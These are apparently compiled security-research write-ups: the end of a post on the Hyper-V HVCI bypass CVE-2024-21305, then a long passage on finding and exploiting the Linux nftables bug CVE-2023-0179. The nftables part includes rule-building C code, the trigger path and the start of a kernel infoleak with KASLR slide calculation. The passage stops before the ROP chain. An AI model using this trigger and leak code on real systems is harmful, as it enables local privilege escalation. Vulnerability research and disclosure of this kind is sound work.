  2. Implementing a trick in the HV. Since the architecture requires that the RMRR memory region must be mapped in the IOMMU (via the Hierarchical Address translation structures described above) using identity mapping with RW access permission (but no X — Execute), we decided to perform some compatibility tests and see what happens if the HV protects all the initial PFNs for RMRR memory regions in the SLAT by stripping the X bit. Indeed, the OS always needs to read or write to those regions, so programming the SLAT is needed.

Tests for fix 2 worked and produced almost zero compatibility issues, so MSFT also decided to increase the protection and remove the X permission on all RMRR memory regions by default on ALL systems, increasing the protection even when the firmware is buggy.

Summary

Hope you enjoyed this jointly written post with both bug reporter’s and developer’s perspectives and a great deal of details on the interaction of VT-d and Hyper-V by Andrea.

To summarize, the combination of buggy UEFI that did not follow one of the requirements of the Intel VT-d specification and a permissive default EPT configuration caused unintended RWX GPAs under HVCI. MSFT resolved the issue by correcting the default permission and their UEFI, and released the fix on January 9. Not all devices are vulnerable to this issue. However, you may identify vulnerable devices by checking whether the memmap UEFI shell command fails to show the exact RMRR memory regions as Reserved.

This repo contains the report and PoC of CVE-2024-21305, the non-secure Hypervisor-Protected Code Integrity (HVCI) configuration vulnerability. This vulnerability allowed arbitrary kernel-mode code execution, effectively bypassing HVCI, within the root partition. For the root cause, read the blog post coauthored with Andrea Allievi (@aall86), a Windows Core OS engineer who analyzed and fixed the issue.

The report in this repo is what I sent to MSRC, which contains the PoC and an initial analysis of the issue.


64 bytes and a ROP chain – A journey through nftables


Original text by Davide Ornaghi

The purpose of this article is to dive into the process of vulnerability research in the Linux kernel through my experience that led to the finding of CVE-2023-0179 and a fully functional Local Privilege Escalation (LPE).
By the end of this post, the reader should be more comfortable interacting with the nftables component and approaching the new mitigations encountered while exploiting the kernel stack from the network context.

1. Context

As a fresh X user indefinitely scrolling through my feed, one day I noticed a tweet about a Netfilter Use-after-Free vulnerability. Not being at all familiar with Linux exploitation, I couldn’t understand much at first, but it reminded me of some concepts I used to study for my thesis, such as kalloc zones and mach_msg spraying on iOS, which got me curious enough to explore even more writeups.

A couple of CVEs later I started noticing an emerging (and perhaps worrying) pattern: Netfilter bugs had been significantly increasing in the last months.

During my initial reads I ran into an awesome article from David Bouman titled How The Tables Have Turned: An analysis of two new Linux vulnerabilities in nf_tables describing the internals of nftables, a Netfilter component and newer version of iptables, in great depth. By the way, I highly suggest reading Sections 1 through 3 to become familiar with the terminology before continuing.

As the subsystem internals made more sense, I started appreciating Linux kernel exploitation more and more, and decided to give myself the challenge to look for a new CVE in the nftables system in a relatively short timeframe.

2. Key aspects of nftables

Touching on the most relevant concepts of nftables, it’s worth introducing only the key elements:

  • NFT tables define the traffic class to be processed (IP(v6), ARP, BRIDGE, NETDEV);
  • NFT chains define at what point in the network path to process traffic (before/after/while routing);
  • NFT rules: lists of expressions that decide whether to accept traffic or drop it.

In programming terms, rules can be seen as instructions and expressions are the single statements that compose them. Expressions can be of different types, and they’re collected inside the net/netfilter directory of the Linux tree, each file starting with the “nft_” prefix.
Each expression has a function table that groups several functions to be executed at a particular point in the workflow, the most important ones being .init, invoked when the rule is created, and .eval, called at runtime during rule evaluation.

Since rules and expressions can be chained together to reach a unique verdict, they have to store their state somewhere. NFT registers are temporary memory locations used to store such data.
For instance, nft_immediate stores a user-controlled immediate value into an arbitrary register, while nft_payload extracts data directly from the received socket buffer.
Registers can be referenced with a 4-byte granularity (NFT_REG32_00 through NFT_REG32_15) or with the legacy option of 16 bytes each (NFT_REG_1 through NFT_REG_4).

But what do tables, chains and rules actually look like from userland?

# nft list ruleset
table inet my_table {
  chain my_chain {
    type filter hook input priority filter; policy drop;
    tcp dport http accept
  }
}

This specific table monitors all IPv4 and IPv6 traffic. The only present chain is of the filter type, which must decide whether to keep packets or drop them; it’s installed at the input level, where traffic has already been routed to the current host and is looking for the next hop, and the default verdict is to drop the packet if the other rules haven’t concluded otherwise.
The rule above is translated into different expressions that carry out the following tasks:

  1. Save the transport header to a register;
  2. Make sure it’s a TCP header;
  3. Save the TCP destination port to a register;
  4. Emit the NF_ACCEPT verdict if the register contains the value 80 (HTTP port).

Since David’s article already contains all the architectural details, I’ll just move over to the relevant aspects.

2.1 Introducing Sets and Maps

One of the advantages of nftables over iptables is the possibility to match a certain field with multiple values. For instance, if we wanted to only accept traffic directed to the HTTP and HTTPS protocols, we could implement the following rule:

nft add rule ip filter input tcp dport {http, https} accept

In this case, HTTP and HTTPS internally belong to an “anonymous set” that carries the same lifetime as the rule bound to it. When a rule is deleted, any associated set is destroyed too.
In order to make a set persistent (aka “named set”), we can just give it a name, type and values:

nft add set filter AllowedProto { type inet_proto\; flags constant\;}
nft add element filter AllowedProto { https, https }

While this type of set is only useful to match against a list/range of values, nftables also provides maps, an evolution of sets behaving like the hash map data structure. One of their use cases, as mentioned in the wiki, is to pick a destination host based on the packet’s destination port:

nft add map nat porttoip  { type inet_service: ipv4_addr\; }
nft add element nat porttoip { 80 : 192.168.1.100, 8888 : 192.168.1.101 }

From a programmer’s point of view, registers are like local variables, only existing in the current chain, and sets/maps are global variables persisting over consecutive chain evaluations.

2.2 Programming with nftables

Finding a potential security issue in the Linux codebase is pointless if we can’t also define a procedure to trigger it and reproduce it quite reliably. That’s why, before digging into the code, I wanted to make sure I had all the necessary tools to programmatically interact with nftables just as if I were sending commands over the terminal.

We already know that we can use the netlink interface to send messages to the subsystem via an AF_NETLINK socket but, if we want to approach nftables at a higher level, the libnftnl project contains several examples showing how to interact with its components: we can thus send create, update and delete requests to all the previously mentioned elements, and libnftnl will take care of the implementation specifics.

For this particular project, I decided to start by examining the CVE-2022-1015 exploit source since it’s based on libnftnl and implements the most repetitive tasks such as building and sending batch requests to the netlink socket. This project also comes with functions to add expressions to rules, at least the most important ones, which makes building rules really handy.

3. Scraping the attack surface

To keep things simple, I decided that I would start by auditing the expression operations, which are invoked at different times in the workflow. Let’s take the nft_payload expression as an example:

static const struct nft_expr_ops nft_payload_ops = {
    .type       = &nft_payload_type,
    .size       = NFT_EXPR_SIZE(sizeof(struct nft_payload)),
    .eval       = nft_payload_eval,
    .init       = nft_payload_init,
    .dump       = nft_payload_dump,
    .reduce     = nft_payload_reduce,
    .offload    = nft_payload_offload,
};

Besides eval and init, which we’ve already touched on, there are a couple other candidates to keep in mind:

  • dump: reads the expression parameters and packs them into an skb. As a read-only operation, it represents an attractive attack surface for infoleaks rather than memory corruptions.
  • reduce: I couldn’t find any reference to this function call, which shied me away from it.
  • offload: adds support for nft_payload expression in case Flowtables are being used with hardware offload. This one definitely adds some complexity and deserves more attention in future research, although specific NIC hardware is required to reach the attack surface.

As my first research target, I ended up sticking with the same ops I started with, init and eval.

3.1 Previous vulnerabilities

We now know where to look for suspicious code, but what are we exactly looking for?
The netfilter bugs I was reading about definitely influenced the vulnerability classes in my scope:

CVE-2022-1015

/* net/netfilter/nf_tables_api.c */

static int nft_validate_register_load(enum nft_registers reg, unsigned int len)
{
    /* We can never read from the verdict register,
     * so bail out if the index is 0,1,2,3 */
    if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)
        return -EINVAL;
    /* Invalid operation, bail out */
    if (len == 0)
        return -EINVAL;
    /* Integer overflow allows bypassing the check */
    if (reg * NFT_REG32_SIZE + len > sizeof_field(struct nft_regs, data)) 
        return -ERANGE;

    return 0;
}  

int nft_parse_register_load(const struct nlattr *attr, u8 *sreg, u32 len)
{
    ...
    err = nft_validate_register_load(reg, len);
    if (err < 0)
        return err;
    /* the 8 LSB from reg are written to sreg, which can be used as an index 
     * for read and write operations in some expressions */
    *sreg = reg;
    return 0;
}  

I also had a look at different subsystems, such as TIPC.

CVE-2022-0435

/* net/tipc/monitor.c */

void tipc_mon_rcv(struct net *net, void *data, u16 dlen, u32 addr,
    struct tipc_mon_state *state, int bearer_id)
{
    ...
    struct tipc_mon_domain *arrv_dom = data;
    struct tipc_mon_domain dom_bef;                                   
    ...

    /* doesn't check for maximum new_member_cnt */                      
    if (dlen < dom_rec_len(arrv_dom, 0))                              
        return;
    if (dlen != dom_rec_len(arrv_dom, new_member_cnt))                
        return;
    if (dlen < new_dlen || arrv_dlen != new_dlen)
        return; 
    ...
    /* Drop duplicate unless we are waiting for a probe response */
    if (!more(new_gen, state->peer_gen) && !probing)                  
        return;
    ...

    /* Cache current domain record for later use */
    dom_bef.member_cnt = 0;
    dom = peer->domain;
    /* memcpy with out of bounds domain record */
    if (dom)                                                         
        memcpy(&dom_bef, dom, dom->len);           

A common pattern can be derived from these samples: if we can pass the sanity checks on a certain boundary, either via integer overflow or incorrect logic, then we can reach a write primitive which will write data out of bounds. In other words, typical buffer overflows can still be interesting!

Here is the structure of the ideal vulnerable code chunk: one or more if statements followed by a write instruction such as memcpy, memset, or simply *x = y inside all the eval and init operations of the net/netfilter/nft_*.c files.

3.2 Spotting a new bug

At this point, I downloaded the latest stable Linux release from The Linux Kernel Archives, which was 6.1.6 at the time, opened it up in my IDE (sadly not vim) and started browsing around.

I initially tried with regular expressions but I soon found it too difficult to exclude the unwanted sources and to match a write primitive with its boundary checks, plus the results were often overwhelming. Thus I moved on to the good old manual auditing strategy.
For context, this is how quickly a regex can become too complex:
if\s*\(\s*(\w+\s*[+\-*/]\s*\w+)\s*(==|!=|>|<|>=|<=)\s*(\w+\s*[+\-*/]\s*\w+)\s*\)\s*\{

Turns out that semantic analysis engines such as CodeQL and Weggli would have done a much better job; I will show how they can be used to search for similar bugs in a later article.

While exploring the nft_payload_eval function, I spotted an interesting occurrence:

/* net/netfilter/nft_payload.c */

switch (priv->base) {
    case NFT_PAYLOAD_LL_HEADER:
        if (!skb_mac_header_was_set(skb))
            goto err;
        if (skb_vlan_tag_present(skb)) {
            if (!nft_payload_copy_vlan(dest, skb,
                           priv->offset, priv->len))
                goto err;
            return;
        }

The nft_payload_copy_vlan function is called with two user-controlled parameters: priv->offset and priv->len. Remember that nft_payload’s purpose is to copy data from a particular layer header (IP, TCP, UDP, 802.11…) to an arbitrary register, and the user gets to specify the offset inside the header to copy data from, as well as the size of the copied chunk.

The following code snippet illustrates how to copy the destination address from the IP header to register 0 and compare it against a known value:

int create_filter_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq)
{
    struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);
    in_addr_t d_addr;
    d_addr = inet_addr("192.168.123.123");
    rule_add_payload(r, NFT_PAYLOAD_NETWORK_HEADER, offsetof(struct iphdr, daddr), sizeof d_addr, NFT_REG32_00);
    rule_add_cmp(r, NFT_CMP_EQ, NFT_REG32_00, &d_addr, sizeof d_addr);
    rule_add_immediate_verdict(r, NFT_GOTO, "next_chain");
    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, family, (void**)&r, seq,
        NULL
    );
}

All definitions for the rule_* functions can be found in my Github project.

When I looked at the code under nft_payload_copy_vlan, a frequent C programming pattern caught my eye:

/* net/netfilter/nft_payload.c */

if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
	ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;

memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

These lines determine the size of a memcpy call based on a fairly extended arithmetic operation. I later found out their purpose was to align the skb pointer to the maximum allowed offset, which is the end of the second VLAN tag (at most 2 tags are allowed). VLAN encapsulation is a common technique used by providers to separate customers inside the provider’s network and to transparently route their traffic.

At first I thought I could cause an overflow in the conditional statement, but then I realized that the offset + len expression was being promoted to a uint32_t from uint8_t, making it impossible to reach MAX_INT with 8-bit values:

<+396>:   mov   r11d,DWORD PTR [rbp-0x64]
<+400>:   mov   r10d,DWORD PTR [rbp-0x6c]
gef➤ x/wx $rbp-0x64
0xffffc90000003a0c:   0x00000004
gef➤ x/wx $rbp-0x6c
0xffffc90000003a04:   0x00000013

The compiler treats the two operands as DWORD PTR, hence 32 bits.

After this first disappointment, I started wandering elsewhere, until I came back to the same spot to double check that piece of code which kept looking suspicious.

On the next line, when assigning the ethlen variable, I noticed that the VLAN header length (4 bytes), vlan_hlen, was being subtracted from ethlen instead of being added to restore the alignment with the second VLAN tag.
By trying all possible offset and len pairs, I could confirm that some of them were actually causing ethlen to underflow, wrapping it back towards UINT8_MAX. For example, with a single VLAN tag present (vlan_hlen = 4, VLAN_ETH_HLEN = 18), offset = 19 and len = 4 give ethlen = 4 - (19 + 4 - 18 + 4) = -5, which wraps to 251 as a u8, whereas the intended value was 4 - (23 - 22) = 3.
With a vulnerability at hand, I documented my findings and promptly sent them to security@kernel.org and the involved distros.
I also accidentally alerted some public mailing lists such as syzbot’s, which caused a small dispute to decide whether the issue should have been made public immediately via oss-security or not. In the end we managed to release the official patch for the stable tree in a day or two and proceeded with the disclosure process.

How an Out-Of-Bounds Copy vulnerability works:

  • OOB Write: reading from an accessible memory area and subsequently writing to areas outside the destination buffer.
  • OOB Read: reading from a memory area outside the source buffer and writing to readable areas.

The behavior of CVE-2023-0179:

  • Expected scenario: the size of the copy operation “len” is correctly decreased to exclude restricted fields, and saved in “ethlen”.
  • Vulnerable scenario: the value of “ethlen” is decreased below zero and wraps to the maximum value (255), allowing even inaccessible fields to be copied.

4. Reaching the code path

Even the most powerful vulnerability is useless unless it can be triggered, even in a probabilistic manner; here, we’re inside the evaluation function for the nft_payload expression, which led me to believe that if the code branch was there, then it must be reachable in some way (of course this isn’t always the case).

I’ve already shown how to setup the vulnerable rule, we just have to choose an overflowing offset/length pair like so:

uint8_t offset = 19, len = 4;
struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);
rule_add_payload(r, NFT_PAYLOAD_LL_HEADER, offset, len, NFT_REG32_00);

Once the rule is in place, we have to force its evaluation by generating some traffic, unfortunately normal traffic won’t pass through the nft_payload_copy_vlan function, only VLAN-tagged packets will.

4.1 Debugging nftables

From here on, gdb’s assistance proved to be crucial to trace the network paths for input packets.
I chose to spin up a QEMU instance with debugging support, since it’s really easy to feed it your own kernel image and rootfs, and then attach gdb from the host.

When booting from QEMU, it will be more practical to have the kernel modules you need automatically loaded:

# not all configs are required for this bug
CONFIG_VLAN_8021Q=y
CONFIG_VETH=y
CONFIG_BRIDGE=y
CONFIG_BRIDGE_NETFILTER=y
CONFIG_NF_TABLES=y
CONFIG_NF_TABLES_INET=y
CONFIG_NF_TABLES_NETDEV=y
CONFIG_NF_TABLES_IPV4=y
CONFIG_NF_TABLES_ARP=y
CONFIG_NF_TABLES_BRIDGE=y
CONFIG_USER_NS=y
CONFIG_CMDLINE_BOOL=y
CONFIG_CMDLINE="net.ifnames=0"

As for the initial root file system, one with the essential networking utilities can be built for x86_64 (openssh, bridge-utils, nft) by following this guide. Alternatively, syzkaller provides the create-image.sh script which automates the process.
Once everything is ready, QEMU can be run with custom options, for instance:

qemu-system-x86_64 -kernel linuxk/linux-6.1.6/vmlinux -drive format=raw,file=linuxk/buildroot/output/images/rootfs.ext4,if=virtio -nographic -append "root=/dev/vda console=ttyS0" -net nic,model=e1000 -net user,hostfwd=tcp::10022-:22,hostfwd=udp::5556-:1337

This setup allows communicating with the emulated OS via SSH (host port 10022 forwarded to guest port 22) and via UDP (host port 5556 forwarded to guest port 1337). Notice how the host and the emulated NIC are connected indirectly via a virtual hub and aren’t placed on the same segment.
After booting the kernel up, the remote debugger is accessible on local port 1234, hence we can set the required breakpoints:

turtlearm@turtlelinux:~/linuxk/old/linux-6.1.6$ gdb vmlinux
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
...                 
88 commands loaded and 5 functions added for GDB 12.1 in 0.01ms using Python engine 3.10
Reading symbols from vmlinux...               
gef➤  target remote :1234
Remote debugging using :1234
(remote) gef➤  info b
Num     Type           Disp Enb Address            What
1       breakpoint     keep y   0xffffffff81c47d50 in nft_payload_eval at net/netfilter/nft_payload.c:133
2       breakpoint     keep y   0xffffffff81c47ebf in nft_payload_copy_vlan at net/netfilter/nft_payload.c:64

Now, hitting breakpoint 2 will confirm that we successfully entered the vulnerable path.

4.2 Main issues

How can I send a packet which definitely enters the correct path? Answering this question was more troublesome than expected.

UDP is definitely easier to handle than TCP, but a UDP socket (SOCK_DGRAM) wouldn’t let me add a VLAN header (layer 2), and using a raw socket was out of the question as it would bypass the network stack, including the NFT hooks.

Instead of crafting my own packets, I just tried configuring a VLAN interface on the ethernet device eth0:

ip link add link eth0 name vlan.10 type vlan id 10
ip addr add 192.168.10.137/24 dev vlan.10
ip link set vlan.10 up

With these commands I could bind a UDP socket to the vlan.10 interface and hope to see VLAN-tagged packets leaving through eth0. Of course, that wasn’t the case: the new interface wasn’t holding the necessary routes, and only ARP requests were being produced.

Another attempt involved replicating the physical use case of encapsulated VLANs (Q-in-Q) but in my local network to see what I would receive on the destination host.
Surprisingly, after setting up the same VLAN and subnet on both machines, I managed to emit VLAN-tagged packets from the source host but, no matter how many tags I embedded, they were all being stripped out from the datagram when reaching the destination interface.

This behavior is due to Linux acting as a router: since VLAN is a layer 2 protocol, a VLAN ends when a router is met, so it would be useless for Netfilter to process those tags.

Going back to the kernel source, I was able to spot the exact point where the tag was being stripped out during a process called VLAN offloading, where the NIC driver removes the tag and forwards traffic to the networking stack.

The __netif_receive_skb_core function takes the previously crafted skb and delivers it to the upper protocol layers by calling deliver_skb.
802.1q packets are subject to VLAN offloading here:

/* net/core/dev.c */

static int __netif_receive_skb_core(struct sk_buff **pskb, bool pfmemalloc,
				    struct packet_type **ppt_prev)
{
...
if (eth_type_vlan(skb->protocol)) {
	skb = skb_vlan_untag(skb);
	if (unlikely(!skb))
		goto out;
}
...
}

skb_vlan_untag also sets the vlan_tci, vlan_proto, and vlan_present fields of the skb so that the network stack can later fetch the VLAN information if needed.
The function then calls all tap handlers like the protocol sniffers that are listed inside the ptype_all list and finally enters another branch that deals with VLAN packets:

/* net/core/dev.c */

if (skb_vlan_tag_present(skb)) {
	if (pt_prev) {
		ret = deliver_skb(skb, pt_prev, orig_dev);
		pt_prev = NULL;
	}
	if (vlan_do_receive(&skb)) {
		goto another_round;
	}
	else if (unlikely(!skb))
		goto out;
}

The main actor here is vlan_do_receive that actually delivers the 802.1q packet to the appropriate VLAN port. If it finds the appropriate interface, the vlan_present field is reset and another round of __netif_receive_skb_core is performed, this time as an untagged packet with the new device interface.

However, these three lines got me curious because they allowed skipping the vlan_present reset and going straight to the IP receive handlers with the 802.1q packet, which is what I needed to reach the nft hooks:

/* net/8021q/vlan_core.c */

vlan_dev = vlan_find_dev(skb->dev, vlan_proto, vlan_id);
if (!vlan_dev)  // if it cannot find vlan dev, go back to netif_receive_skb_core and don't untag
	return false;
...
__vlan_hwaccel_clear_tag(skb); // unset vlan_present flag, making skb_vlan_tag_present false

Remember that the vulnerable code path requires vlan_present to be set (from skb_vlan_tag_present(skb)), so if I sent a packet from a VLAN-aware interface to a VLAN-unaware interface, vlan_do_receive would return false without unsetting the present flag, and that would be perfect in theory.

One more problem arose at this point: the nft_payload_copy_vlan function requires the skb protocol to be either ETH_P_8021AD or ETH_P_8021Q, otherwise vlan_hlen won’t be assigned and the code path won’t be taken:

/* net/netfilter/nft_payload.c */

static bool nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
{
...
if ((skb->protocol == htons(ETH_P_8021AD) ||
	 skb->protocol == htons(ETH_P_8021Q)) &&
	offset >= VLAN_ETH_HLEN && offset < VLAN_ETH_HLEN + VLAN_HLEN)
		vlan_hlen += VLAN_HLEN;

Unfortunately, skb_vlan_untag will also reset the inner protocol, making this branch impossible to enter; in the end this path turned out to be a rabbit hole.

While thinking about a different approach I remembered that, since VLAN is a layer 2 protocol, I should have probably turned Ubuntu into a bridge and saved the NFT rules inside the NFPROTO_BRIDGE hooks.
To achieve that, I needed a way to merge the features of a bridge and a VLAN device: enter VLAN filtering!
This feature was introduced in Linux kernel 3.8 and allows using different subnets with multiple guests on a virtualization server (KVM/QEMU) without manually creating VLAN interfaces but only using one bridge.
After creating the bridge, I had to enter promiscuous mode to always reach the NF_BR_LOCAL_IN bridge hook:

/* net/bridge/br_input.c */

static int br_pass_frame_up(struct sk_buff *skb) {
...
	/* Bridge is just like any other port.  Make sure the
	 * packet is allowed except in promisc mode when someone
	 * may be running packet capture.
	 */
	if (!(brdev->flags & IFF_PROMISC) &&
	    !br_allowed_egress(vg, skb)) {
		kfree_skb(skb);
		return NET_RX_DROP;
	}
...
	return NF_HOOK(NFPROTO_BRIDGE, NF_BR_LOCAL_IN,
		       dev_net(indev), NULL, skb, indev, NULL,
		       br_netif_receive_skb);

and finally enable VLAN filtering to enter the br_handle_vlan function (/net/bridge/br_vlan.c) and avoid any __vlan_hwaccel_clear_tag call inside the bridge module.

sudo ip link set br0 type bridge vlan_filtering 1
sudo ip link set br0 promisc on

While this configuration seemed to work at first, it became unstable after a very short time, since when vlan_filtering kicked in I stopped receiving traffic.

All previous attempts weren’t nearly as reliable as I needed them to be in order to proceed to the exploitation stage. Nevertheless, I learned a lot about the networking stack and the Netfilter implementation.

4.3 The Netfilter Holy Grail

Netfilter hooks

While I could’ve continued looking for ways to stabilize VLAN filtering, I opted for a handier way to trigger the bug.

This chart was taken from the nftables wiki and represents all possible packet flows for each family. The netdev family is of particular interest since its hooks are located at the very beginning, in the Ingress hook.
According to this article the netdev family is attached to a single network interface and sees all network traffic (L2+L3+ARP).
Going back to __netif_receive_skb_core I noticed how the ingress handler was called before vlan_do_receive (which removes the vlan_present flag), meaning that if I could register a NFT hook there, it would have full visibility over the VLAN information:

/* net/core/dev.c */

static int __netif_receive_skb_core(struct sk_buff **pskb, bool pfmemalloc, struct packet_type **ppt_prev) {
...
#ifdef CONFIG_NET_INGRESS
...
    if (nf_ingress(skb, &pt_prev, &ret, orig_dev) < 0) // insert hook here
        goto out;
#endif
...
    if (skb_vlan_tag_present(skb)) {
        if (pt_prev) {
            ret = deliver_skb(skb, pt_prev, orig_dev);
            pt_prev = NULL;
        }
        if (vlan_do_receive(&skb)) // delete vlan info
            goto another_round;
        else if (unlikely(!skb))
            goto out;
    }
...

The convenient part is that you don’t even have to receive the actual packets to trigger such hooks because in normal network conditions you will always(?) get the respective ARP requests on broadcast, also carrying the same VLAN tag!

Here’s how to create a base chain belonging to the netdev family:

struct nftnl_chain* c;
c = nftnl_chain_alloc();
nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name);
nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name);
if (dev_name)
    nftnl_chain_set_str(c, NFTNL_CHAIN_DEV, dev_name); // set device name
if (base_param) { // set ingress hook number and max priority
    nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, NF_NETDEV_INGRESS);
    nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, INT_MIN);
}

And that’s it, you can now send random traffic from a VLAN-aware interface to the chosen network device and the ARP requests will trigger the vulnerable code path.
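
To generate that traffic programmatically, it is enough to poke an unresolved address on the VLAN subnet, which makes the kernel broadcast an ARP request carrying the 802.1Q tag. A minimal sketch (interface name and addresses mirror the earlier setup and are purely illustrative):

#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

static void poke_vlan(void)
{
    int fd = socket(AF_INET, SOCK_DGRAM, 0);

    /* force the datagram out of the VLAN-aware interface */
    setsockopt(fd, SOL_SOCKET, SO_BINDTODEVICE, "vlan.10", sizeof("vlan.10"));

    /* an address with no ARP cache entry: the kernel broadcasts a tagged
     * ARP request before it can deliver the datagram */
    struct sockaddr_in dst = { .sin_family = AF_INET, .sin_port = htons(1337) };
    inet_pton(AF_INET, "192.168.10.254", &dst.sin_addr);

    sendto(fd, "A", 1, 0, (struct sockaddr *)&dst, sizeof(dst));
    close(fd);
}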

64 bytes and a ROP chain – A journey through nftables – Part 2

2.1. Getting an infoleak

Can I turn this bug into something useful? At this point I had a rough idea of how to leak some data, although I wasn’t sure what kind of data would come out of the stack.
The idea was to overflow into the first NFT register (NFT_REG32_00) so that all the remaining ones would contain the mysterious data. It also wasn’t clear how to extract this leak in the first place, until I vaguely remembered the nft_dynset expression from CVE-2022-1015, which inserts key:data pairs into a hashmap-like data structure (which is actually an nft_set) that can later be fetched from userland. Since we can add registers to the dynset, we can reference them like so:
key[i] = NFT_REG32_i, value[i] = NFT_REG32_(i+8)
This solution should allow avoiding duplicate keys, but we should still check that all key registers contain different values, otherwise we will lose their values.
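
For reference, this is roughly how such a dynset expression can be attached to a rule with libnftnl (a minimal sketch rather than the PoC code: it assumes the map already exists and reuses the same rule-building helpers shown earlier):

#include <stdint.h>
#include <libnftnl/expr.h>
#include <libnftnl/rule.h>
#include <linux/netfilter/nf_tables.h>

/* attach one "dynset" expression that stores key = reg(sreg_key),
 * value = reg(sreg_data) into the map named set_name */
static void rule_add_dynset(struct nftnl_rule *r, const char *set_name,
                            uint32_t sreg_key, uint32_t sreg_data)
{
    struct nftnl_expr *e = nftnl_expr_alloc("dynset");
    nftnl_expr_set_str(e, NFTNL_EXPR_DYNSET_SET_NAME, set_name);
    nftnl_expr_set_u32(e, NFTNL_EXPR_DYNSET_OP, NFT_DYNSET_OP_ADD);
    nftnl_expr_set_u32(e, NFTNL_EXPR_DYNSET_SREG_KEY, sreg_key);
    nftnl_expr_set_u32(e, NFTNL_EXPR_DYNSET_SREG_DATA, sreg_data);
    nftnl_rule_add_expr(r, e);
}

/* key[i] = NFT_REG32_i, value[i] = NFT_REG32_(i+8) */
static void rule_dump_regs(struct nftnl_rule *r, const char *set_name)
{
    for (int i = 0; i < 8; i++)
        rule_add_dynset(r, set_name, NFT_REG32_00 + i, NFT_REG32_00 + 8 + i);
}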

2.1.1 Returning the registers

Having a programmatic way to read the contents of a set would be best in this case. Randorisec accomplished the same task in their CVE-2022-1972 infoleak exploit, where they send a netlink message of the NFT_MSG_GETSET type and parse the received message from an iovec.
Although this technique seems to be the most straightforward one, I went for an easier route that required some admittedly unnecessary bash scripting.
I decided to employ the nft utility (from the nftables package), which carries out all the parsing for us.

If I wanted to improve this part, I would definitely parse the netlink response without the external dependency of the nft binary, which makes it less elegant and much slower.

After overflowing, we can run the following command to retrieve all elements of the specified map belonging to a netdev table:

$ nft list map netdev {table_name} {set_name}

table netdev mytable {
	map myset12 {
		type 0x0 [invalid type] : 0x0 [invalid type]
		size 65535
		elements = { 0x0 [invalid type] : 0x0 [invalid type],
			     0x5810000 [invalid type] : 0xc9ffff30 [invalid type],
			     0xbccb410 [invalid type] : 0x88ffff10 [invalid type],
			     0x3a000000 [invalid type] : 0xcfc281ff [invalid type],
			     0x596c405f [invalid type] : 0x7c630680 [invalid type],
			     0x78630680 [invalid type] : 0x3d000000 [invalid type],
			     0x88ffff08 [invalid type] : 0xc9ffffe0 [invalid type],
			     0x88ffffe0 [invalid type] : 0xc9ffffa1 [invalid type],
			     0xc9ffffa1 [invalid type] : 0xcfc281ff [invalid type] }
	}
}

2.1.2 Understanding the registers

Seeing all those ffff was already a good sign, but let’s review the different kernel addresses we could run into (this might change due to ASLR and other factors):

  • .TEXT (code) section addresses: 0xffffffff8[1-3]……
  • Stack addresses: 0xffffc9……….
  • Heap addresses: 0xffff8880……..

We can ask gdb for a second opinion to see if we actually spotted any of them:

gef➤ p &regs 
$12 = (struct nft_regs *) 0xffffc90000003ae0
gef➤ x/12gx 0xffffc90000003ad3
0xffffc90000003ad3:    0x0ce92fffffc90000    0xffffffffffffff81
0xffffc90000003ae3:    0x071d0000000000ff    0x008105ffff888004
0xffffc90000003af3:    0xb4cc0b5f406c5900    0xffff888006637810    <==
0xffffc90000003b03:    0xffff888006637808    0xffffc90000003ae0    <==
0xffffc90000003b13:    0xffff888006637c30    0xffffc90000003d10
0xffffc90000003b23:    0xffffc90000003ce0    0xffffffff81c2cfa1    <==

Looks like a stack canary is present at address 0xffffc90000003af3, which could be useful later when overwriting one of the saved instruction pointers on the stack. Moreover, we can see an instruction address (0xffffffff81c2cfa1) and a reference to the regs variable itself (0xffffc90000003ae0)!
Gdb also tells us that the instruction belongs to the nft_do_chain routine:

gef➤ x/i 0xffffffff81c2cfa1
0xffffffff81c2cfa1 <nft_do_chain+897>:    jmp    0xffffffff81c2cda7 <nft_do_chain+391>

Based on that information, I could use the leaked nft_do_chain address to calculate the KASLR slide: pull the same address out of a KASLR-enabled system and subtract the static one from it.
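
In code this boils down to a single subtraction (a sketch; the constant is the nft_do_chain+897 address observed above on the debug kernel, which has KASLR disabled):

#include <stdint.h>

/* nft_do_chain+897 as observed above on the debug kernel (KASLR disabled) */
#define NFT_DO_CHAIN_897_NOKASLR 0xffffffff81c2cfa1ULL

/* leaked is the return address recovered from the map on the target */
static uint64_t kaslr_slide(uint64_t leaked)
{
    return leaked - NFT_DO_CHAIN_897_NOKASLR;
}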

Since it would be too inconvenient to reassemble these addresses manually, we could select the NFT registers containing the interesting data and add them to the set, leading to the following result:

table netdev {table_name} {
	map {set_name} {
		type 0x0 [invalid type] : 0x0 [invalid type]
		size 65535
		elements = { 0x88ffffe0 [invalid type] : 0x3a000000 [invalid type],     <== (1)
			           0xc9ffffa1 [invalid type] : 0xcfc281ff [invalid type] }    <== (2)   
	}
}

From the output we could clearly discern the shuffled regs (1) and nft_do_chain (2) addresses.
To explain how this infoleak works, I had to map out the stack layout at the time of the overflow, as it stays the same upon different nft_do_chain runs.

The regs struct is initialized with zeros at the beginning of nft_do_chain, and is immediately followed by the nft_jumpstack struct, containing the list of rules to be evaluated on the next nft_do_chain call, in a stack-like format (LIFO).

The vulnerable memcpy source is evaluated from the vlanh pointer referring to the struct vlan_ethhdr veth local variable, which resides in the nft_payload_eval stack frame, since nft_payload_copy_vlan is inlined by the compiler.
The copy operation therefore looks something like the following:

State of the stack post-overflow

